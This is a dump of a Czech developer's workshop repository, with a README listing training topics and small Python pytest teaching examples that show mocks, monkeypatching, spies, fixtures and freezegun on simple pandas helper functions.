script_for_mocks.do_something_with_frame(mocked_object)\n \n mocked_object.insert.assert_called_once()\n \ndef test_insert_called():\n mocked_object = Mock()\n script_for_mocks.do_something_with_frame(mocked_object)\n \n mocked_object.insert.assert_called()\n \ndef test_drop_called():\n mocked_object = Mock()\n script_for_mocks.do_something_with_frame(mocked_object)\n \n mocked_object.drop.assert_called()\n\ndef test_insert_called_last_time_with_expected_params():\n mocked_object = Mock()\n script_for_mocks.do_something_with_frame(mocked_object)\n expected_params = (1, \"another_column\", 142)\n #because call_args is a call object which have tuple at index 0\n actual_params = mocked_object.insert.call_args[0]\n assert expected_params == actual_params\n \ndef test_insert_called_both_times_with_expected_params():\n mocked_object = Mock()\n script_for_mocks.do_something_with_frame(mocked_object)\n \n first_expected_params = (1, \"some_column\", 42)\n second_expected_params = (1, \"another_column\", 142)\n\n first_call_params, second_call_params = mocked_object.insert.call_args_list\n first_actual_params = first_call_params[0]\n second_actual_params = second_call_params[0]\n assert first_expected_params == first_actual_params\n assert second_expected_params == second_actual_params\n \n\n\n " }, { "alpha_fraction": 0.7888198494911194, "alphanum_fraction": 0.7892635464668274, "avg_line_length": 96.9565200805664, "blob_id": "6dac037deb84ce152d4e639ecd64a6a811489ba9", "content_id": "f83d990fd61aa40b20fa2327b81a8071c4aae049", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2469, "license_type": "no_license", "max_line_length": 498, "num_lines": 23, "path": "/readme.md", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "# Co to tady je?\nV tomto repozitáři se nalézají podklady pro workshopy/přednášky, které jsem udělal/dělám/udělám v nejmenované korporaci. Jelikož pro účatníky bude pohodlnější dostat se k těmto materiálům, když se budou nacházet na \"vnějším\" internetu, a protože jsem na věci stejně pracoval ve volné čase, umísťuji je sem na veřejný repozitář a ne na intranet. \nKaždá přednáška resp. okruh přednášek má v repozitáři svůj vlastní adresář. V něm se nachází jednak jupyterovský notebook, jednak konverze tohoto notebooku do html - notebooky se totiž nezobrazují v IE. Nicméně jelikož lehce pokročilejší témata tak nějak předpokládají buďto Jupyter nainstalovaný na lokálu, anebo možnost používat nezastaralý prohlížeč, konverzi notebooku do html souboru u nich už nepokládám za potřebnou. Případně se zde budou nalézat i další materiály, obvykle asi py soubory. \nPokud objevíte nějakou chybu či zavádějící formulaci, napište mi to prosím do Issues. \nMožná se Vám po kliknutí na notebook (ipynb soubor) zobrazí hláška \"Sorry, something went wrong. Reload?\". V takovém případě jděte [sem](https://nbviewer.jupyter.org/) a do textového pole vložte adresu notebooku, např. https://github.com/vitsaidl/workshops/blob/master/machine_learning/machine_learning.ipynb. \nEDIT - jelikož jsem zjistil, že se tento repozitář také hodí jako sbírka ucelených poznámek, když si potřebuji při práci nějakou věc připomenou,t objeví se zde občas i věci, které s žádným workshopem nic moc společného nemají.\n\n# Aktuální podklady \n- Intro do Pythonu (od \"Hello world\" k funkcím) \n- Pokračování intra se zaměřením na objekty v Pythonu \n- Pandas - základní ovládání, analogie k SQL, načítání a ukládání, vizualizace \n- Regulární výrazy (primárně pro Python, ale řeší se tu i Notepad++ a Teradata) \n- Machine learning - příprava dat, pár základních algoritmů, interpretabilita, pipeliny \n- Ukládání ML modelů ve formátu ONNX a následné použití těchto modelů v Javě (adresář machine_learning) \n- Adversary útoky (adresář machine_learning) \n- Text - základy NLP \n- Text - používání OpenAI a Langchainu \n- Vytváření grafů v Pythonu \n- Úvod do Pytorche \n- Práce s daty a ML v PySparku \n- Sbírka drobných textů k různým pythoním balíčkům \n- Elasticsearch \n- Neo4j " }, { "alpha_fraction": 0.5956284403800964, "alphanum_fraction": 0.6202185750007629, "avg_line_length": 21.6875, "blob_id": "46158810dd16b038db0a3a9ec77ca63636481043", "content_id": "9717fd8623cc050c7c4db20227242e57b3451b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "no_license", "max_line_length": 53, "num_lines": 16, "path": "/pytest/monkeypatching/script_for_monkeypatching.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom numpy import sqrt\nfrom typing import List\n\ndef get_some_frame()->None:\n some_frame = pd.DataFrame({\n \"first_col\": [1, 2, 3],\n \"second_col\": [10, 20, 30]\n })\n \n frame_from_method = some_frame.copy()\n\n return frame_from_method \n\ndef get_list_sqrt(input_list:List[int])->List[float]:\n return sqrt(input_list) " }, { "alpha_fraction": 0.6529411673545837, "alphanum_fraction": 0.658823549747467, "avg_line_length": 23.428571701049805, "blob_id": "232ac2335581e7ac60004eca9b29995e54e008d6", "content_id": "3b61579fc918f9f7cde487988ea125921a12bb30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 48, "num_lines": 7, "path": "/pytest/pytest_operative/some_tested_script.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "from typing import List\n\ndef get_increment_by_five(orig_number:int)->int:\n return orig_number + 5\n\ndef get_some_list() -> List[str]:\n return [\"one\", \"two\", \"three\"]" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 14.25, "blob_id": "4034166ab305f86bda89fdd83dffc618b571530f", "content_id": "d5ca44c96a11e707b7d38e99b3f274be3dcf0d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 60, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/pytest/pytest_operative/pytest.ini", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "[pytest]\nmarkers =\n computation: some label\n something" }, { "alpha_fraction": 0.6738836169242859, "alphanum_fraction": 0.6765899658203125, "avg_line_length": 26.407407760620117, "blob_id": "15fdb2af4d78bacbefe8e598fa2954fe085e3c77", "content_id": "8b70abfcb888d85630d4bdf108fe4b9152fc91c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 739, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/pytest/spying/tests/test_get_another_frame.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_spying\nimport pandas as pd\n\ndef test_insert_called_twice_at_real(mocker):\n\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_spying.get_another_frame()\n \n expected_call_count = 2\n actual_call_count = spy_insert.call_count\n \n assert expected_call_count == actual_call_count\n\ndef test_insert_called_twice_at_fake(monkeypatch, mocker):\n def fake_insert(*args, **kwargs):\n pass\n \n monkeypatch.setattr(pd.DataFrame, \"insert\", fake_insert)\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_spying.get_another_frame()\n \n expected_call_count = 2\n actual_call_count = spy_insert.call_count\n \n assert expected_call_count == actual_call_count" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 33.85714340209961, "blob_id": "377f283fb6da274c0e0312b85407e48e3f3d77e1", "content_id": "7c1884982c58ae272dc0a8ea1142a8a4dbf3491e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "no_license", "max_line_length": 74, "num_lines": 7, "path": "/pytest/module_tests/tests/test_get_double_string.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import moduleshow.scripts_text\n\ndef test_double_string_returned():\n orig_string = \"abcd\"\n expected_result = \"abcdabcd\"\n actual_result = moduleshow.scripts_text.get_double_string(orig_string)\n assert expected_result == actual_result" }, { "alpha_fraction": 0.6870967745780945, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 27.272727966308594, "blob_id": "6190a7456d5fff9fc4373af6b8e5fa02c3a198dc", "content_id": "63f8eb8f4171af75056115056d5071788a7037ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 90, "num_lines": 11, "path": "/pytest/first_tests/tests/test_get_difference_of_two_numbers.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import math_script\n\ndef test_expected_difference_returned():\n first_number = 20\n second_number = 5\n expected_result = 15\n actual_result = math_script.get_difference_of_two_numbers(first_number, second_number)\n assert expected_result == actual_result\n\ndef test_this_fill_fail():\n assert 1 == 2" }, { "alpha_fraction": 0.6937500238418579, "alphanum_fraction": 0.699999988079071, "avg_line_length": 25.83333396911621, "blob_id": "0172d4561be93d20f50ca2dc5ae5eb3500fab523", "content_id": "bd307c80157b03b4a442a9877fe104de2c2020d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/pytest/freezegun/script_for_freezegun.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import datetime\n\ndef get_date_week_ago()->datetime.date:\n today = datetime.date.today()\n week_ago = today - datetime.timedelta(days=7)\n return week_ago" }, { "alpha_fraction": 0.6863905191421509, "alphanum_fraction": 0.7140039205551147, "avg_line_length": 38.07692337036133, "blob_id": "9a56f0b052ab2cc8c3c98be2c86e82cec856c93a", "content_id": "ebfe81e54eb3fa086754d881fd4b7d40e51cf2b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 80, "num_lines": 13, "path": "/pytest/mocks/script_for_mocks.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\n\ndef do_something_with_frame(orig_frame:pd.DataFrame)-> None:\n orig_frame.insert(1, \"some_column\", 42)\n orig_frame.insert(1, \"another_column\", 142)\n \ndef do_something_with_frame_args_kwargs(orig_frame:pd.DataFrame)-> None:\n orig_frame.insert(1, \"some_column\", value=42)\n orig_frame.insert(1, \"another_column\", value=142)\n\ndef get_frame_without_col(orig_frame:pd.DataFrame, col_name:str)-> pd.DataFrame:\n something = orig_frame.drop(column=col_name)\n return something" }, { "alpha_fraction": 0.5363247990608215, "alphanum_fraction": 0.5961538553237915, "avg_line_length": 22.350000381469727, "blob_id": "6f8f2a00451bc33b63114c9177366dabcf85bea3", "content_id": "ad74e24a6e5cd281d6b5bc7e323fa51a1fd956d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 55, "num_lines": 20, "path": "/pytest/spying/script_for_spying.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\n\n\ndef get_another_frame()->None:\n some_frame = pd.DataFrame({\n \"first_col\": [1, 2, 3],\n \"second_col\": [10, 20, 30]\n })\n \n some_frame.insert(1, \"third_col\", [40, 50, 60])\n some_frame.insert(1, \"fourth_col\", [400, 500, 600])\n frame_from_method = some_frame.copy()\n\n return frame_from_method \n\ndef get_nothing(number:int, text:str)->None:\n return None\n\ndef wrapper_function()->None:\n get_nothing(42, \"hello\")\n\n" }, { "alpha_fraction": 0.7533039450645447, "alphanum_fraction": 0.7533039450645447, "avg_line_length": 44.599998474121094, "blob_id": "de064175153d607bde4e59689afca3e9408f9595", "content_id": "3637b25abfee758926e2d22b59e9d9d311a06e4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 227, "license_type": "no_license", "max_line_length": 76, "num_lines": 5, "path": "/pytest/first_tests/math_script.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "def get_sum_of_two_numbers(first_number:int, second_number:int)->int:\n return first_number + second_number\n\ndef get_difference_of_two_numbers(first_number:int, second_number:int)->int:\n return first_number - second_number" }, { "alpha_fraction": 0.5963302850723267, "alphanum_fraction": 0.6299694180488586, "avg_line_length": 28.81818199157715, "blob_id": "5d635f1786421833c0c9950ae1d55a8b3208d60c", "content_id": "9d33401b6ac2a0b0dadb17e02e415c25b2355075", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/pytest/monkeypatching/tests/test_get_list_sqrt.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_monkeypatching\n\ndef test_fake_sqrt(monkeypatch):\n def fake_sqrt(*args, **kwargs):\n return [1, 1, 1, 1]\n \n monkeypatch.setattr(script_for_monkeypatching, \"sqrt\", fake_sqrt)\n \n result_list = script_for_monkeypatching.get_list_sqrt([2, 4, 9])\n \n assert [1, 1, 1, 1] == result_list" }, { "alpha_fraction": 0.6875529289245605, "alphanum_fraction": 0.696867048740387, "avg_line_length": 30.945945739746094, "blob_id": "e68ec82c5982607e7c5247227248962ed72b6ea1", "content_id": "adf3fad4ba666c0b6edd10e02a8110caefde4ff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 87, "num_lines": 37, "path": "/pytest/fixtures/tests/test_get_frame_column_count_plus_one.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_fixtures\nimport pandas as pd\nimport pytest\n\[email protected]\ndef frame_for_test()->pd.DataFrame:\n return pd.DataFrame({\"some_col\":[1,2,3]})\n\ndef test_returned_expected_column_count_no_fixture():\n dummy_frame = pd.DataFrame({\"some_col\":[1,2,3]})\n \n expected_result = 2\n actual_result = script_for_fixtures.get_frame_column_count_plus_one(dummy_frame)\n \n assert expected_result == actual_result\n \ndef test_insert_called_once_no_fixture(mocker):\n dummy_frame = pd.DataFrame({\"some_col\":[1,2,3]})\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_fixtures.get_frame_column_count_plus_one(dummy_frame)\n \n spy_insert.assert_called_once()\n \ndef test_returned_expected_column_count_used_fixture(frame_for_test):\n expected_result = 2\n actual_result = script_for_fixtures.get_frame_column_count_plus_one(frame_for_test)\n \n assert expected_result == actual_result\n \ndef test_insert_called_once_used_fixture(frame_for_test, mocker):\n\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_fixtures.get_frame_column_count_plus_one(frame_for_test)\n \n spy_insert.assert_called_once()" }, { "alpha_fraction": 0.6673180460929871, "alphanum_fraction": 0.700537383556366, "avg_line_length": 33.13333511352539, "blob_id": "e6dbc69a78a42fdb6a3ceea92aabd07a4ddbf416", "content_id": "71acb2a96a8e9f798621d2cde66d2c300a4a22fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2047, "license_type": "no_license", "max_line_length": 86, "num_lines": 60, "path": "/pytest/slightly_complicated/tests/test_get_slightly_increased_number.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import slightly_complicated\nimport pytest\nimport pandas as pd\n\ndef test_incrase_works():\n orig_number = 5\n expected_result = 5.001\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n \n assert actual_result == pytest.approx(expected_result, abs=0.0005)\n\ndef test_this_will_fail():\n orig_number = 5\n expected_result = 5.002\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n \n assert actual_result == pytest.approx(expected_result, abs=0.0005)\n\ndef test_increased_number_is_float():\n orig_number = 5\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n assert isinstance(actual_result, float)\n \ndef test_increased_number_is_integer():\n orig_number = 5\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n assert isinstance(actual_result, int)\n\ndef test_expected_list():\n expected_result = [1, 2, 3]\n actual_result = slightly_complicated.get_some_list()\n assert expected_result == actual_result\n\ndef test_expected_dict():\n expected_result = {\"key_2\":20, \"key_1\":10}\n actual_result = slightly_complicated.get_some_dict()\n assert expected_result == actual_result\n\ndef test_naive_expected_frame():\n expected_result = pd.DataFrame({\n \"column_1\": [10, 20, 30],\n \"column_2\": [100, 200, 300]\n })\n actual_result = slightly_complicated.get_some_frame()\n assert expected_result == actual_result\n\ndef test_expected_frame():\n expected_result = pd.DataFrame({\n \"column_1\": [10, 20, 30],\n \"column_2\": [100, 200, 300]\n })\n actual_result = slightly_complicated.get_some_frame()\n frames_differences = pd.testing.assert_frame_equal(expected_result, actual_result)\n assert frames_differences is None\n\ndef test_exception_raised():\n first_number = 10\n second_number = 0\n with pytest.raises(slightly_complicated.UselessZeroDivisionException):\n slightly_complicated.get_division_result(first_number, second_number)" }, { "alpha_fraction": 0.717391312122345, "alphanum_fraction": 0.7236024737358093, "avg_line_length": 34.88888931274414, "blob_id": "f808d53e2e8972042d426ec16182f2c74fb190b5", "content_id": "15a09f623b570b97b2d84fb8537534cb2efab05e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 66, "num_lines": 9, "path": "/pytest/spying/tests/test_wrapper_function.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_spying\n\ndef test_inner_function_called_with_expected_params(mocker):\n spy_get_nothing = mocker.spy(script_for_spying, \"get_nothing\")\n \n script_for_spying.wrapper_function()\n \n #don't do assert spy_something.assert_called_with(something)!\n spy_get_nothing.assert_called_with(42, \"hello\")" }, { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.7062146663665771, "avg_line_length": 34.599998474121094, "blob_id": "b813e40ea220da25e5b75b84ef6ba63c3ec9ad6b", "content_id": "e086224918179b711eb9472c170dab09786cf14a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/pytest/fixtures/script_for_fixtures.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\n\ndef get_frame_column_count_plus_one(input_frame:pd.DataFrame)->int:\n input_frame.insert(1, \"some_col_name\", [10, 20, 30])\n return input_frame.shape[1]" }, { "alpha_fraction": 0.5962643623352051, "alphanum_fraction": 0.6408045887947083, "avg_line_length": 23.535715103149414, "blob_id": "645f3745df983c446ffcd4c964e469ec180fc948", "content_id": "f1aebc6444b61c4f3796a99c812e88fb5a198127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 696, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/pytest/slightly_complicated/slightly_complicated.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom typing import List, Dict\n\ndef get_slightly_increased_number(orig_number:int)->float:\n increment = 0.001\n return orig_number + increment\n \ndef get_some_list()->List[int]:\n return [1, 2, 3]\n\ndef get_some_dict()->Dict[str,int]:\n return {\"key_1\":10, \"key_2\":20}\n\ndef get_some_frame()->pd.DataFrame:\n return pd.DataFrame({\n \"column_1\": [10, 20, 30],\n \"column_2\": [100, 200, 300]\n })\n\n \nclass UselessZeroDivisionException(Exception):\n pass\n \ndef get_division_result(first_number:int, second_number:int)->float:\n if second_number == 0:\n raise UselessZeroDivisionException\n \n return first_number/second_number\n \n " }, { "alpha_fraction": 0.6086448431015015, "alphanum_fraction": 0.6822429895401001, "avg_line_length": 28.55172348022461, "blob_id": "438e68196f4c6c47a7bb33cdaace724e9591d1c9", "content_id": "868d160d9202bfdafb967ab5b6551b3e029568f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 856, "license_type": "no_license", "max_line_length": 64, "num_lines": 29, "path": "/pytest/freezegun/tests/test_get_date_week_ago.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import freezegun\nimport datetime\nimport script_for_freezegun\n\ndef test_raw_use_freezer():\n expected_result = datetime.date(2022, 1, 21)\n \n freezer = freezegun.freeze_time(\"2022-01-28 12:00:01\")\n freezer.start()\n actual_result = script_for_freezegun.get_date_week_ago()\n freezer.stop()\n \n assert expected_result == actual_result\n \ndef test_freezer_context_manager():\n expected_result = datetime.date(2022, 1, 21)\n \n with freezegun.freeze_time(\"2022-01-28 12:00:01\"):\n actual_result = script_for_freezegun.get_date_week_ago()\n \n assert expected_result == actual_result\n\[email protected]_time(\"2022-01-28 12:00:01\")\ndef test_freezer_decorator():\n expected_result = datetime.date(2022, 1, 21)\n \n actual_result = script_for_freezegun.get_date_week_ago()\n \n assert expected_result == actual_result" }, { "alpha_fraction": 0.6566757559776306, "alphanum_fraction": 0.6702997088432312, "avg_line_length": 29.66666603088379, "blob_id": "462d9d8397da24d215f64d86c4294516d4c76e9c", "content_id": "49a71942cc43633ea3739cb1c44593cc619e78ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 367, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/pytest/monkeypatching/tests/test_get_frame.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_monkeypatching\nimport pandas as pd\n\ndef test_something(monkeypatch):\n def fake_copy(*args, **kwargs):\n return pd.DataFrame({\"fake_column\": [42, 142]})\n \n monkeypatch.setattr(pd.DataFrame, \"copy\", fake_copy)\n \n result_frame = script_for_monkeypatching.get_some_frame()\n \n assert result_frame.columns == [\"fake_column\"]" }, { "alpha_fraction": 0.6973415017127991, "alphanum_fraction": 0.7096114754676819, "avg_line_length": 34, "blob_id": "0d481ca31c3fc54e307404c769fd7c0ee35cf840", "content_id": "e1fc2dfc2b12a554c4eba7657f2cda1197e35e73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 489, "license_type": "no_license", "max_line_length": 71, "num_lines": 14, "path": "/pytest/mocks/tests/test_do_something_with_frame_args_kwargs.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_mocks\nfrom unittest.mock import Mock\n\ndef test_insert_called_last_time_with_expected_params():\n mocked_object = Mock()\n script_for_mocks.do_something_with_frame_args_kwargs(mocked_object)\n expected_args = (1, \"another_column\")\n expected_kwargs = {\"value\":142}\n \n actual_args = mocked_object.insert.call_args[0]\n actual_kwargs = mocked_object.insert.call_args[1]\n \n assert expected_args == actual_args\n assert expected_kwargs == actual_kwargs" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.739130437374115, "avg_line_length": 34, "blob_id": "cef85db0e3d94b2f8b4719731765b7b2047a77d7", "content_id": "fcf7ff3304fb1514dbfae2934195a47d3fcd984f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 44, "num_lines": 2, "path": "/pytest/module_tests/moduleshow/scripts_text.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "def get_double_string(orig_string:str)->str:\n return orig_string*2" } ]
28
jiafulow/UF-slurm
https://github.com/jiafulow/UF-slurm
1c9d5f3205cbdc2787b613cb22bbecd36683f937
c5efda4dc55f86cd3fa8af84594d7ed8dd9bb439
c469f1cb029585dddef8551579a6206e8a4d18ea
refs/heads/master
2021-09-26T03:30:28.275297
2018-09-27T20:32:03
2018-09-28T19:00:14
140,448,309
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7829457521438599, "alphanum_fraction": 0.7984496355056763, "avg_line_length": 42, "blob_id": "35130d05cbc07ff7504b05d2d1a85fef96ecd73b", "content_id": "5f2933f356799e32059483596f3af276399965c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/startup.sh", "repo_name": "jiafulow/UF-slurm", "src_encoding": "UTF-8", "text": "export JFTEST=/home/uf/jlow/jftest3/miniconda3\nexport PATH=$JFTEST/bin:$PATH\nexport LD_LIBRARY_PATH=$JFTEST/lib:$LD_LIBRARY_PATH\n" }, { "alpha_fraction": 0.48245614767074585, "alphanum_fraction": 0.48245614767074585, "avg_line_length": 30.090909957885742, "blob_id": "c980d01c49a9dc4d4390ccd3941c70c5a84da871", "content_id": "58931c3cc8fef160256eb68d1f72ec10e10e8af0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 60, "num_lines": 11, "path": "/test.py", "repo_name": "jiafulow/UF-slurm", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nprint(tf.__version__)\n\n# __________________________________________________________\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\n\n# __________________________________________________________\nhello = tf.constant('Hello, TensorFlow!')\nsess = tf.Session()\nprint(sess.run(hello))\n" }, { "alpha_fraction": 0.731589138507843, "alphanum_fraction": 0.7461240291595459, "avg_line_length": 21.434782028198242, "blob_id": "c9bb2e3dd9501a931101b837b6a60ef204310643", "content_id": "42abe16d312a738854c60d9b3198349a81b385c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1032, "license_type": "no_license", "max_line_length": 62, "num_lines": 46, "path": "/test_mnist.sh", "repo_name": "jiafulow/UF-slurm", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#SBATCH -o logs/output.%j.out\n#SBATCH -e logs/output.%j.out\n\n# Set environment variables\nsource startup.sh\n\n# Activate conda env\nexport VENV=tensorflow_conda\nsource activate $VENV\n\n# Fix issue related to missing libraries\nexport LD_LIBRARY_PATH=$JFTEST/envs/$VENV/lib:$LD_LIBRARY_PATH\n\n# Fix issue related to unavailable GPU devices \n# - https://github.com/NVIDIA/nvidia-docker/issues/262\n# - https://github.com/tensorflow/tensorflow/issues/152\n#export CUDA_VISIBLE_DEVICES='0,1,2,3,4,5,6,7'\nexport CUDA_VISIBLE_DEVICES='1'\n\n# Some checks\necho 'Checking PATH ...'\necho $PATH\necho 'Checking LD_LIBRARY_PATH ...'\necho $LD_LIBRARY_PATH\necho 'Checking PYTHONPATH ...'\necho $PYTHONPATH\necho 'Checking visible devices ...'\necho $CUDA_VISIBLE_DEVICES\necho 'Checking conda ...'\nwhich conda\necho 'Checking python ...'\nwhich python\necho 'Checking nvidia-smi ...'\nnvidia-smi\n\n# System info\n#sudo /mops/linux/sysinfo/sysinfo\n#env | grep SLURM\n\n# Run python\npython test.py\n\n# Run tensorflow\nexport CMSSW_VERSION=\npython cnn_mnist.py\n" } ]
3
neeraj2296/Multi-Linear-Regression-ExcelR
https://github.com/neeraj2296/Multi-Linear-Regression-ExcelR
c3679d0e4cab4daadebcdae32914e6c83f485c54
1600fd940dc64982e05e95a85336959ee1970490
963c6720e2cee056d0a05bbeaf4fb492d14a5479
refs/heads/master
2022-07-05T18:21:45.492628
2020-05-20T15:33:17
2020-05-20T15:33:17
258,804,862
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5151697397232056, "alphanum_fraction": 0.6179032921791077, "avg_line_length": 44.25, "blob_id": "cf35b3e24df06ff4c0b2bb900c3e27c33db860a3", "content_id": "fafcc98b378c49c2cf9ad709894f53e8c226fe4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6658, "license_type": "no_license", "max_line_length": 296, "num_lines": 144, "path": "/Computer_data_python_codes1.2.py", "repo_name": "neeraj2296/Multi-Linear-Regression-ExcelR", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 23 21:17:06 2020\r\n\r\n@author: Neeraj Kumar S J\r\n\"\"\"\r\n\r\n############################################# Importing the Modules ##############################################\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.formula.api as smf\r\nfrom sklearn import preprocessing\r\nfrom ml_metrics import rmse\r\n\r\n############################################# Importing the dataset ##############################################\r\n\r\ncomputer = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Computer_Data.csv\")\r\ncomp = computer\r\ncomp = comp.drop(['Unnamed: 0'],axis = 1)\r\ncomp.columns = ['pr','sp','hd','ram','sc','cd','mu','pre','ad','tr']\r\ncomp.describe()\r\n############################################# Label Encoding the state variable ##################################\r\nLe = preprocessing.LabelEncoder()\r\ncomp['cd_t'] = Le.fit_transform(comp['cd'])\r\ncomp['mu_t'] = Le.fit_transform(comp['mu'])\r\ncomp['pre_t'] = Le.fit_transform(comp['pre'])\r\ncomp = comp.drop('cd',axis = 1)\r\ncomp = comp.drop('mu',axis = 1)\r\ncomp = comp.drop('pre',axis = 1)\r\ncomp.columns = ['pr','sp','hd','ram','sc','ad','tr','cd','mu','pre']\r\n\r\n#finding the correlation between variables\r\ncor_comp = comp.corr()\r\n\r\n############################################# Visualizing and normalizing the data to remove outliers ###########\r\n#scomp = comp.drop('St',axis = 1)\r\nplt.hist\r\nn_comp = preprocessing.normalize(comp)\r\nplt.hist(n_comp)\r\nimport seaborn as sns\r\nsns.pairplot(comp)\r\n############################################# Building the model 1 ###############################################\r\n\r\nmod1 = smf.ols('pr~sp+hd+ram+sc+ad+tr+cd+mu+pre',data=comp).fit()\r\nmod1.summary()\r\nimport statsmodels.api as sm\r\nsm.graphics.influence_plot(mod1)\r\n\r\ne_comp = comp.drop(comp.index[[5960,1101,900]],axis = 0)\r\n\r\nnmod1 = smf.ols('pr~sp+hd+ram+sc+ad+tr+cd+mu+pre',data=e_comp).fit()\r\nnmod1.summary()\r\n\r\npred1 = mod1.predict(e_comp)#Predicting the price using model1\r\nrootmse1 = rmse(pred1,e_comp.pr)#calculating the root mean square error\r\nrootmse1# = 274.9527714849643\r\nact1 = comp.pr\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n\r\n############################################# Building the model 2 ###############################################\r\n\r\nmod2 = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=e_comp).fit()\r\nmod2.summary()\r\n\r\n#import statsmodels.api as 